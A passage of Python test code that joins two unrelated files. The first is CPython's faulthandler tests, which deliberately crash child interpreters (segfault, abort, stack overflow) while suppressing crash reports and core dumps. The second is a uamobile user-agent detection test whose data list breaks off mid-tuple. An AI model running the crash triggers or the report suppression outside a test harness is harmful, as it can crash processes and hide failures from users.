"""Try to prevent a crash report from popping up.
On Windows, don't display the Windows Error Reporting dialog. On UNIX,
disable the creation of coredump file.
"""
old_value = None
def __enter__(self):
"""On Windows, disable Windows Error Reporting dialogs using
SetErrorMode.
On UNIX, try to save the previous core file size limit, then set
soft limit to 0.
"""
if sys.platform.startswith('win'):
# see http://msdn.microsoft.com/en-us/library/windows/desktop/ms680621.aspx
# GetErrorMode is not available on Windows XP and Windows Server 2003,
# but SetErrorMode returns the previous value, so we can use that
import ctypes
self._k32 = ctypes.windll.kernel32
SEM_NOGPFAULTERRORBOX = 0x02
self.old_value = self._k32.SetErrorMode(SEM_NOGPFAULTERRORBOX)
self._k32.SetErrorMode(self.old_value | SEM_NOGPFAULTERRORBOX)
else:
if resource is not None:
try:
self.old_value = resource.getrlimit(resource.RLIMIT_CORE)
resource.setrlimit(resource.RLIMIT_CORE,
(0, self.old_value[1]))
except (ValueError, OSError):
pass
if sys.platform == 'darwin':
# Check if the 'Crash Reporter' on OSX was configured
# in 'Developer' mode and warn that it will get triggered
# when it is.
#
# This assumes that this context manager is used in tests
# that might trigger the next manager.
value = subprocess.Popen(['/usr/bin/defaults', 'read',
'com.apple.CrashReporter', 'DialogType'],
stdout=subprocess.PIPE).communicate()[0]
if value.strip() == b'developer':
sys.stdout.write("this test triggers the Crash "
"Reporter, that is intentional")
sys.stdout.flush()
return self
def __exit__(self, *ignore_exc):
"""Restore Windows ErrorMode or core file behavior to initial value."""
if self.old_value is None:
return
if sys.platform.startswith('win'):
self._k32.SetErrorMode(self.old_value)
else:
if resource is not None:
try:
resource.setrlimit(resource.RLIMIT_CORE, self.old_value)
except (ValueError, OSError):
pass
try:
skipIf = unittest.skipIf
except AttributeError:
import functools
def skipIf(test, reason):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not test:
return func(*args, **kw)
else:
print("skip %s: %s" % (func.__name__, reason))
return wrapper
return decorator
try:
from resource import setrlimit, RLIMIT_CORE, error as resource_error
except ImportError:
prepare_subprocess = None
else:
def prepare_subprocess():
# don't create core file
try:
setrlimit(RLIMIT_CORE, (0, 0))
except (ValueError, resource_error):
pass
def spawn_python(*args, **kwargs):
args = (sys.executable,) + args
return subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, **kwargs)
def expected_traceback(lineno1, lineno2, header, min_count=1):
regex = header
regex += ' File "<string>", line %s in func\n' % lineno1
regex += ' File "<string>", line %s in <module>' % lineno2
if 1 < min_count:
return '^' + (regex + '\n') * (min_count - 1) + regex
else:
return '^' + regex + '$'
@contextmanager
def temporary_filename():
filename = tempfile.mktemp()
try:
yield filename
finally:
try:
os.unlink(filename)
except OSError:
pass
class FaultHandlerTests(unittest.TestCase):
def get_output(self, code, filename=None, **kwargs):
"""
Run the specified code in Python (in a new child process) and read the
output from the standard error or from a file (if filename is set).
Return the output lines as a list.
Strip the reference count from the standard error for Python debug
build, and replace "Current thread 0x00007f8d8fbd9700" by "Current
thread XXX".
"""
code = dedent(code).strip()
with SuppressCrashReport():
process = spawn_python('-c', code, **kwargs)
stdout, stderr = process.communicate()
exitcode = process.wait()
output = re.sub(br"\[\d+ refs\]\r?\n?", b"", stdout).strip()
output = output.decode('ascii', 'backslashreplace')
if filename:
self.assertEqual(output, '')
with open(filename, "rb") as fp:
output = fp.read()
output = output.decode('ascii', 'backslashreplace')
output = re.sub('Current thread 0x[0-9a-f]+',
'Current thread XXX',
output)
return output.splitlines(), exitcode
def check_error(self, code, line_number, fatal_error,
filename=None, all_threads=True, other_regex=None,
thread_name=r"python([23](\.\d)?)?", **kwargs):
"""
Check that the fault handler for fatal errors is enabled and check the
traceback from the child process output.
Raise an error if the output doesn't match the expected format.
"""
if all_threads:
if sys.version_info[:2] == (2, 6):
thread_name = 'python'
if sys.platform.startswith('linux') and thread_name is not None:
header = r'Current thread XXX <{0}> \(most recent call first\)'.format(thread_name)
else:
header = r'Current thread XXX \(most recent call first\)'
else:
header = 'Stack \(most recent call first\)'
regex = """
^{fatal_error}
{header}:
File "<string>", line {lineno} in <module>
"""
regex = dedent(regex).format(
lineno=line_number,
fatal_error=fatal_error,
header=header).strip()
if other_regex:
regex += '|' + other_regex
output, exitcode = self.get_output(code, filename, **kwargs)
output = '\n'.join(output)
self.assertRegex(output, regex)
self.assertNotEqual(exitcode, 0)
def check_fatal_error(self, code, line_number, name_regex, **kw):
fatal_error = 'Fatal Python error: %s' % name_regex
self.check_error(code, line_number, fatal_error, **kw)
def check_windows_exception(self, code, line_number, name_regex, **kw):
fatal_error = 'Windows (fatal )?exception: %s' % name_regex
self.check_error(code, line_number, fatal_error, **kw)
@skipIf(sys.platform.startswith('aix'),
"the first page of memory is a mapped read-only on AIX")
def test_read_null(self):
if not MS_WINDOWS:
self.check_fatal_error("""
import faulthandler
faulthandler.enable()
faulthandler._read_null()
""",
3,
# Issue #12700: Read NULL raises SIGILL on Mac OS X Lion
'(?:Segmentation fault'
'|Bus error'
'|Illegal instruction)')
else:
self.check_windows_exception("""
import faulthandler
faulthandler.enable()
faulthandler._read_null()
""",
3,
'access violation')
def test_sigsegv(self):
self.check_fatal_error("""
import faulthandler
faulthandler.enable()
faulthandler._sigsegv()
""",
3,
'Segmentation fault')
def test_sigabrt(self):
self.check_fatal_error("""
import faulthandler
faulthandler.enable()
faulthandler._sigabrt()
""",
3,
'Aborted')
@skipIf(sys.platform == 'win32',
"SIGFPE cannot be caught on Windows")
def test_sigfpe(self):
self.check_fatal_error("""
import faulthandler
faulthandler.enable()
faulthandler._sigfpe()
""",
3,
'Floating point exception')
@skipIf(not hasattr(signal, 'SIGBUS'), 'need signal.SIGBUS')
def test_sigbus(self):
self.check_fatal_error("""
import faulthandler
import signal
faulthandler.enable()
faulthandler._raise_signal(signal.SIGBUS)
""",
5,
'Bus error')
@skipIf(not hasattr(signal, 'SIGILL'), 'need signal.SIGILL')
def test_sigill(self):
self.check_fatal_error("""
import faulthandler
import signal
faulthandler.enable()
faulthandler._raise_signal(signal.SIGILL)
""",
5,
'Illegal instruction')
def test_fatal_error(self):
if sys.version_info >= (2, 6):
arg = "b'xyz'"
else:
arg = "'xyz'"
message = "xyz\n"
if sys.platform.startswith('win'):
# When running unit tests with Microsoft Windows SDK,
# Py_FatalError() displays the message "This application has
# requested the Runtime to terminate it in an unusual way. Please
# contact the application's support team for more information.".
# Just ignore this message, it is not related to faulthandler.
message += r"(.|\n)*"
message += "Fatal Python error: Aborted"
self.check_fatal_error("""
import faulthandler
faulthandler.enable()
faulthandler._fatal_error(%s)
""" % arg,
3,
message)
@skipIf(sys.platform.startswith('openbsd') and HAVE_THREADS,
"Issue #12868: sigaltstack() doesn't work on "
"OpenBSD if Python is compiled with pthread")
@skipIf(not hasattr(faulthandler, '_stack_overflow'),
'need faulthandler._stack_overflow()')
def test_stack_overflow(self):
if not MS_WINDOWS:
self.check_fatal_error("""
import faulthandler
faulthandler.enable()
faulthandler._stack_overflow()
""",
3,
'(?:Segmentation fault|Bus error)',
other_regex='unable to raise a stack overflow')
else:
self.check_windows_exception("""
import faulthandler
faulthandler.enable()
faulthandler._stack_overflow()
""",
3,
'stack overflow')
def test_gil_released(self):
self.check_fatal_error("""
import faulthandler
faulthandler.enable()
faulthandler._sigsegv(True)
""",
3,
'Segmentation fault')
def test_enable_file(self):
with temporary_filename() as filename:
self.check_fatal_error("""
import faulthandler
output = open({filename}, 'wb')
faulthandler.enable(output)
faulthandler._sigsegv()
""".format(filename=repr(filename)),
4,
'Segmentation fault',
filename=filename)
def test_enable_single_thread(self):
self.check_fatal_error("""
import faulthandler
faulthandler.enable(all_threads=False)
faulthandler._sigsegv()
""",
3,
'Segmentation fault',
all_threads=False)
def test_enable_env_var(self):
output, exitcode = self.get_output("""
import faulthandler
print(faulthandler.is_enabled())
""",
env=dict(os.environ, PYTHONFAULTHANDLER='x'))
self.assertEqual(output, ["True"])
self.assertEqual(exitcode, 0)
output, exitcode = self.get_output("""
import faulthandler
print(faulthandler.is_enabled())
""",
env=dict(os.environ, PYTHONFAULTHANDLER=''))
self.assertEqual(output, ["False"])
self.assertEqual(exitcode, 0)
def test_disable(self):
code = """
import faulthandler
faulthandler.enable()
faulthandler.disable()
faulthandler._sigsegv()
"""
not_expected = 'Fatal Python error'
stderr, exitcode = self.get_output(code)
stderr = '\n'.join(stderr)
self.assertTrue(not_expected not in stderr,
"%r is present in %r" % (not_expected, stderr))
self.assertNotEqual(exitcode, 0)
def test_is_enabled(self):
orig_stderr = sys.stderr
try:
# regrtest may replace sys.stderr by io.StringIO object, but
# faulthandler.enable() requires that sys.stderr has a fileno()
# method
sys.stderr = sys.__stderr__
was_enabled = faulthandler.is_enabled()
try:
faulthandler.enable()
self.assertTrue(faulthandler.is_enabled())
faulthandler.disable()
self.assertFalse(faulthandler.is_enabled())
finally:
if was_enabled:
faulthandler.enable()
else:
faulthandler.disable()
finally:
sys.stderr = orig_stderr
def test_disabled_by_default(self):
# By default, the module should be disabled
code = "import faulthandler; print(faulthandler.is_enabled())"
args = (sys.executable, '-c', code)
# don't use assert_python_ok() because it always enable faulthandler
process = subprocess.Popen(args, stdout=subprocess.PIPE)
output, _ = process.communicate()
exitcode = process.wait()
self.assertEqual(output.rstrip(), b"False")
self.assertEqual(exitcode, 0)
def check_dump_traceback(self, filename):
"""
Explicitly call dump_traceback() function and check its output.
Raise an error if the output doesn't match the expected format.
"""
code = """
from __future__ import with_statement
import faulthandler
def funcB():
if {has_filename}:
with open({filename}, "wb") as fp:
faulthandler.dump_traceback(fp, all_threads=False)
else:
faulthandler.dump_traceback(all_threads=False)
def funcA():
funcB()
funcA()
"""
code = code.format(
filename=repr(filename),
has_filename=bool(filename),
)
if filename:
lineno = 7
else:
lineno = 9
expected = [
'Stack (most recent call first):',
' File "<string>", line %s in funcB' % lineno,
' File "<string>", line 12 in funcA',
' File "<string>", line 14 in <module>'
]
trace, exitcode = self.get_output(code, filename)
self.assertEqual(trace, expected)
self.assertEqual(exitcode, 0)
def test_dump_traceback(self):
self.check_dump_traceback(None)
def test_dump_traceback_file(self):
with temporary_filename() as filename:
self.check_dump_traceback(filename)
def test_truncate(self):
maxlen = 500
func_name = 'x' * (maxlen + 50)
truncated = 'x' * maxlen + '...'
code = """
import faulthandler
def {func_name}():
faulthandler.dump_traceback(all_threads=False)
{func_name}()
"""
code = code.format(
func_name=func_name,
)
expected = [
'Stack (most recent call first):',
' File "<string>", line 4 in %s' % truncated,
' File "<string>", line 6 in <module>'
]
trace, exitcode = self.get_output(code)
self.assertEqual(trace, expected)
self.assertEqual(exitcode, 0)
@skipIf(sys.platform != 'linux2', 'thread name printing is only supported on Linux')
def test_thread_name_when_set(self):
self.check_fatal_error("""
import faulthandler
faulthandler.enable()
import ctypes
libc = ctypes.cdll.LoadLibrary("libc.so.6")
buf = ctypes.create_string_buffer("some_name")
# PR_SET_NAME
libc.prctl(15, buf)
faulthandler._sigsegv()
""",
8,
'Segmentation fault',
thread_name="some_name"
)
@skipIf(sys.platform != 'linux2', 'thread name printing is only supported on Linux')
def test_thread_name_when_empty(self):
" Will not print the <thread_name> if no name is set "
self.check_fatal_error("""
import faulthandler
faulthandler.enable()
import ctypes
libc = ctypes.cdll.LoadLibrary("libc.so.6")
buf = ctypes.create_string_buffer("")
# PR_SET_NAME
libc.prctl(15, buf)
faulthandler._sigsegv()
""",
8,
'Segmentation fault',
thread_name=None
)
@skipIf(not HAVE_THREADS, 'need threads')
def check_dump_traceback_threads(self, filename):
"""
Call explicitly dump_traceback(all_threads=True) and check the output.
Raise an error if the output doesn't match the expected format.
"""
code = """
from __future__ import with_statement
import faulthandler
from threading import Thread, Event
import time
def dump():
if {filename}:
with open({filename}, "wb") as fp:
faulthandler.dump_traceback(fp, all_threads=True)
else:
faulthandler.dump_traceback(all_threads=True)
class Waiter(Thread):
# avoid blocking if the main thread raises an exception.
daemon = True
def __init__(self):
Thread.__init__(self)
self.running = Event()
self.stop = Event()
def run(self):
self.running.set()
self.stop.wait()
waiter = Waiter()
waiter.start()
waiter.running.wait()
dump()
waiter.stop.set()
waiter.join()
"""
code = code.format(filename=repr(filename))
output, exitcode = self.get_output(code, filename)
output = '\n'.join(output)
if filename:
lineno = 9
else:
lineno = 11
regex = """
^Thread 0x[0-9a-f]+ (\<[\w\.]{{1,16}}\>\s)?\(most recent call first\):
(?: File ".*threading.py", line [0-9]+ in [_a-z]+
){{1,3}} File "<string>", line 24 in run
File ".*threading.py", line [0-9]+ in _?_bootstrap_inner
File ".*threading.py", line [0-9]+ in _?_bootstrap
Current thread XXX (\<[\w\.]{{1,16}}\>\s)?\(most recent call first\):
File "<string>", line {lineno} in dump
File "<string>", line 29 in <module>$
"""
regex = dedent(regex.format(lineno=lineno)).strip()
self.assertRegex(output, regex)
self.assertEqual(exitcode, 0)
def test_dump_traceback_threads(self):
self.check_dump_traceback_threads(None)
def test_dump_traceback_threads_file(self):
with temporary_filename() as filename:
self.check_dump_traceback_threads(filename)
def _check_dump_traceback_later(self, repeat, cancel, filename, loops):
"""
Check how many times the traceback is written in timeout x 2.5 seconds,
or timeout x 3.5 seconds if cancel is True: 1, 2 or 3 times depending
on repeat and cancel options.
Raise an error if the output doesn't match the expect format.
"""
timeout_str = str(datetime.timedelta(seconds=TIMEOUT))
code = """
import faulthandler
import time
def func(timeout, repeat, cancel, file, loops):
for loop in range(loops):
faulthandler.dump_traceback_later(timeout, repeat=repeat, file=file)
if cancel:
faulthandler.cancel_dump_traceback_later()
# sleep twice because time.sleep() is interrupted by
# signals and dump_traceback_later() uses SIGALRM
for loop in range(2):
time.sleep(timeout * 1.25)
faulthandler.cancel_dump_traceback_later()
timeout = {timeout}
repeat = {repeat}
cancel = {cancel}
loops = {loops}
if {has_filename}:
file = open({filename}, "wb")
else:
file = None
func(timeout, repeat, cancel, file, loops)
if file is not None:
file.close()
"""
code = code.format(
timeout=TIMEOUT,
repeat=repeat,
cancel=cancel,
loops=loops,
has_filename=bool(filename),
filename=repr(filename),
)
trace, exitcode = self.get_output(code, filename)
trace = '\n'.join(trace)
if not cancel:
count = loops
if repeat:
count *= 2
header = r'Timeout \(%s\)!\nCurrent thread XXX (\<[\w\.]{1,16}\>\s)?\(most recent call first\):\n' % timeout_str
regex = expected_traceback(12, 23, header, min_count=count)
self.assertRegex(trace, regex)
else:
self.assertEqual(trace, '')
self.assertEqual(exitcode, 0)
@skipIf(not hasattr(faulthandler, 'dump_traceback_later'),
'need faulthandler.dump_traceback_later()')
def check_dump_traceback_later(self, repeat=False, cancel=False,
file=False, twice=False):
if twice:
loops = 2
else:
loops = 1
if file:
with temporary_filename() as filename:
self._check_dump_traceback_later(repeat, cancel,
filename, loops)
else:
self._check_dump_traceback_later(repeat, cancel, None, loops)
def test_dump_traceback_later(self):
self.check_dump_traceback_later()
def test_dump_traceback_later_repeat(self):
self.check_dump_traceback_later(repeat=True)
def test_dump_traceback_later_cancel(self):
self.check_dump_traceback_later(cancel=True)
def test_dump_traceback_later_file(self):
self.check_dump_traceback_later(file=True)
def test_dump_traceback_later_twice(self):
self.check_dump_traceback_later(twice=True)
@skipIf(not hasattr(faulthandler, "register"),
"need faulthandler.register")
def check_register(self, filename=False, all_threads=False,
unregister=False, chain=False):
"""
Register a handler displaying the traceback on a user signal. Raise the
signal and check the written traceback.
If chain is True, check that the previous signal handler is called.
Raise an error if the output doesn't match the expected format.
"""
signum = signal.SIGUSR1
code = """
import faulthandler
import os
import signal
import sys
def func(signum):
os.kill(os.getpid(), signum)
def handler(signum, frame):
handler.called = True
handler.called = False
exitcode = 0
signum = {signum}
unregister = {unregister}
chain = {chain}
if {has_filename}:
file = open({filename}, "wb")
else:
file = None
if chain:
signal.signal(signum, handler)
faulthandler.register(signum, file=file,
all_threads={all_threads}, chain={chain})
if unregister:
faulthandler.unregister(signum)
func(signum)
if chain and not handler.called:
if file is not None:
output = file
else:
output = sys.stderr
output.write("Error: signal handler not called!\\n")
exitcode = 1
if file is not None:
file.close()
sys.exit(exitcode)
"""
code = code.format(
filename=repr(filename),
has_filename=bool(filename),
all_threads=all_threads,
signum=signum,
unregister=unregister,
chain=chain,
)
trace, exitcode = self.get_output(code, filename)
trace = '\n'.join(trace)
if not unregister:
if all_threads:
regex = 'Current thread XXX (\<[\w\.]{1,16}\>\s)?\(most recent call first\):\n'
else:
regex = 'Stack \(most recent call first\):\n'
regex = expected_traceback(7, 28, regex)
self.assertRegex(trace, regex)
else:
self.assertEqual(trace, '')
if unregister:
self.assertNotEqual(exitcode, 0)
else:
self.assertEqual(exitcode, 0)
def test_register(self):
self.check_register()
def test_unregister(self):
self.check_register(unregister=True)
def test_register_file(self):
with temporary_filename() as filename:
self.check_register(filename=filename)
def test_register_threads(self):
self.check_register(all_threads=True)
def test_register_chain(self):
self.check_register(chain=True)
@contextmanager
def check_stderr_none(self):
stderr = sys.stderr
try:
sys.stderr = None
err = '<no exception raised>'
try:
yield
except Exception as exc:
err = exc
self.assertEqual(str(err), "sys.stderr is None")
finally:
sys.stderr = stderr
def test_stderr_None(self):
# Issue #21497: provide an helpful error if sys.stderr is None,
# instead of just an attribute error: "None has no attribute fileno".
with self.check_stderr_none():
faulthandler.enable()
with self.check_stderr_none():
faulthandler.dump_traceback()
if hasattr(faulthandler, 'dump_traceback_later'):
with self.check_stderr_none():
faulthandler.dump_traceback_later(1)
if hasattr(faulthandler, "register"):
with self.check_stderr_none():
faulthandler.register(signal.SIGUSR1)
if not hasattr(unittest.TestCase, 'assertRegex'):
# Copy/paste from Python 3.3: just replace (str, bytes) by str
def assertRegex(self, text, expected_regex, msg=None):
"""Fail the test unless the text matches the regular expression."""
if isinstance(expected_regex, str):
assert expected_regex, "expected_regex must not be empty."
expected_regex = re.compile(expected_regex)
if not expected_regex.search(text):
msg = msg or "Regex didn't match"
msg = '%s: %r not found in %r' % (msg, expected_regex.pattern, text)
raise self.failureException(msg)
if __name__ == "__main__":
unittest.main()
|
# -*- coding: utf-8 -*-
from tests import msg
from uamobile import *
from uamobile.nonmobile import NonMobileUserAgent as NonMobile
def test_detect_fast():
assert detect_fast('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1') == 'nonmobile'
def test_empty_useragent():
try:
ua = detect({})
except:
assert False, 'KeyError HTTP_USER_AGENT should be ignored silently'
else:
pass
def test_useragent_nonmobile():
def inner(useragent):
ua = detect({'HTTP_USER_AGENT':useragent})
assert isinstance(ua, NonMobile)
assert ua.carrier == 'NonMobile'
assert ua.short_carrier == 'N'
assert ua.is_docomo() == False
assert ua.is_ezweb() == False
assert ua.is_softbank() == False
assert ua.is_vodafone() == False
assert ua.is_jphone() == False
assert ua.is_willcom() == False
assert ua.is_nonmobile()
assert ua.display is not None
assert ua.supports_cookie() == True
assert ua.serialnumber is None
for ua in DATA:
yield inner, ua
def test_display_default():
ua = detect({'HTTP_USER_AGENT':'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4'})
assert ua.display.width != 0
assert ua.display.height != 0
assert ua.display.color
assert ua.display.depth
assert ua.display.is_vga() is False
assert ua.display.is_qvga() is True
def test_strip_serialnumber():
value = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4'
ua = detect({'HTTP_USER_AGENT': value})
assert ua.strip_serialnumber() == value
#########################
# Test data
#########################
DATA = ('Mozilla/2.0 (compatible; Ask Jeeves)',
'Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)',
'Mozilla/2.0 (compatible; MSIE 3.02; Windows CE)',
'Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)',
'Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320; PPC)',
'Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; PPC; 240x320)',
'Mozilla/2.0 (compatible; T-H-U-N-D-E-R-S-T-O-N-E)',
'Mozilla/3.0 (DreamPassport/3.0)',
'Mozilla/3.0 (DreamPassport/3.15; SONICTEAM/PSOV2)',
'Mozilla/3.0 (DreamPassport/3.2)',
'Mozilla/3.0 (Slurp.so/Goo; <EMAIL>; http://www.inktomi.com/slurp.html)',
'Mozilla/3.0 (Slurp/si; <EMAIL>; http://www.inktomi.com/slurp.html)',
'Mozilla/3.0 (Win95; I)',
'Mozilla/3.0 (Windows 2000; U) Opera 6.05 [ja]',
'Mozilla/3.0 (aruyo/0.01;http://www.aaacafe.ne.jp/ ;<EMAIL>)',
'Mozilla/3.0 (compatible)',
'Mozilla/3.0 (compatible; Indy Library)',
'Mozilla/3.0 (compatible; NetMind-Minder/4.3.1J)',
'Mozilla/3.0 (compatible; NetPositive/2.2.1; BeOS)',
'Mozilla/3.0 (compatible; PerMan Surfer 3.0; Win95)',
'Mozilla/3.0 (compatible;)',
'Mozilla/3.01 (compatible;)',
'Mozilla/3.01 [ja] (Macintosh; I; 68K)',
'Mozilla/3.01Gold (Macintosh; I; 68K)',
'Mozilla/3.01Gold (Macintosh; I; 68K; SiteCoach 1.0)',
'Mozilla/4.0',
'Mozilla/4.0 (LINKS ARoMATIZED)',
'Mozilla/4.0 (PDA; SL-A300/1.0,Embedix/Qtopia/1.1.0) NetFront/3.0',
'Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0',
'Mozilla/4.0 (Windows NT 4.0)',
'Mozilla/4.0 (compatible',
'Mozilla/4.0 (compatible; MSIE 4.01; MSN 2.5; Windows 95)',
'Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)',
'Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 4.01; Windows NT Windows CE)',
'Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)',
'Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)',
'Mozilla/4.0 (compatible; MSIE 4.5; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.01; MSN 2.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; HKBN)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; MSIECrawler)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; MSOCD; AtHomeJP0109)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; Q312461)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; YComp 5.0.2.4)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; istb 641)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) LinkChecker 0.1',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) WebWasher 3.2',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; NetCaptor 7.0.1)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; T312461)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; istb 641)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; Lunascape 0.99c)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; Norfolk Southern Corp.)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT; nk-07102k)',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 7.0; Windows 98; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.0; Linux 2.2.18-0vl4.2 i686) Opera 6.0 [en]',
'Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC; AtHomeJP191)',
'Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC;)',
'Mozilla/4.0 (compatible; MSIE 5.0; Win32)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.05 [en]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.05 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) Opera 5.12 [es]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) Opera 6.03 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) Opera 6.05 [en]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) Opera 6.05 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)::ELNSB50::0000211003200258031a018f000000000505000b00000000',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; YComp 5.0.0.0)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; Hotbar 3.0)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 6.03 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 6.05 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0) Opera 6.0 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0) Opera 6.01 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0) Opera 6.03 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 4.0) Opera 6.05 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.01 [de]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.03 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.04 [en]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.04 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [ja]',
'Mozilla/4.0 (compatible; MSIE 5.12; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.14; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.21; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.22; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.2; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.2; Mac_PowerPC) OmniWeb/4.1.1-v424.6',
'Mozilla/4.0 (compatible; MSIE 5.5; AOL 6.0; Windows 98; Win 9x 4.90)',
'Mozilla/4.0 (compatible; MSIE 5.5; MSN 2.5; AOL 7.0; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.5; MSN 2.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; T312461)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; YComp 5.0.0.0)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; ie5.5cd_t-zone_0005)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; H010818)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; MSIECrawler)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; MSN 6.1; MSNbMSFT; MSNmja-jp; MSNc00)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; MSOCD; AtHomeJP191)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Q312461)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Q312461; T312461)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461; istb 641)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461; istb 641; COM+ 1.0.2204)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; Lunascape 0.98d)',
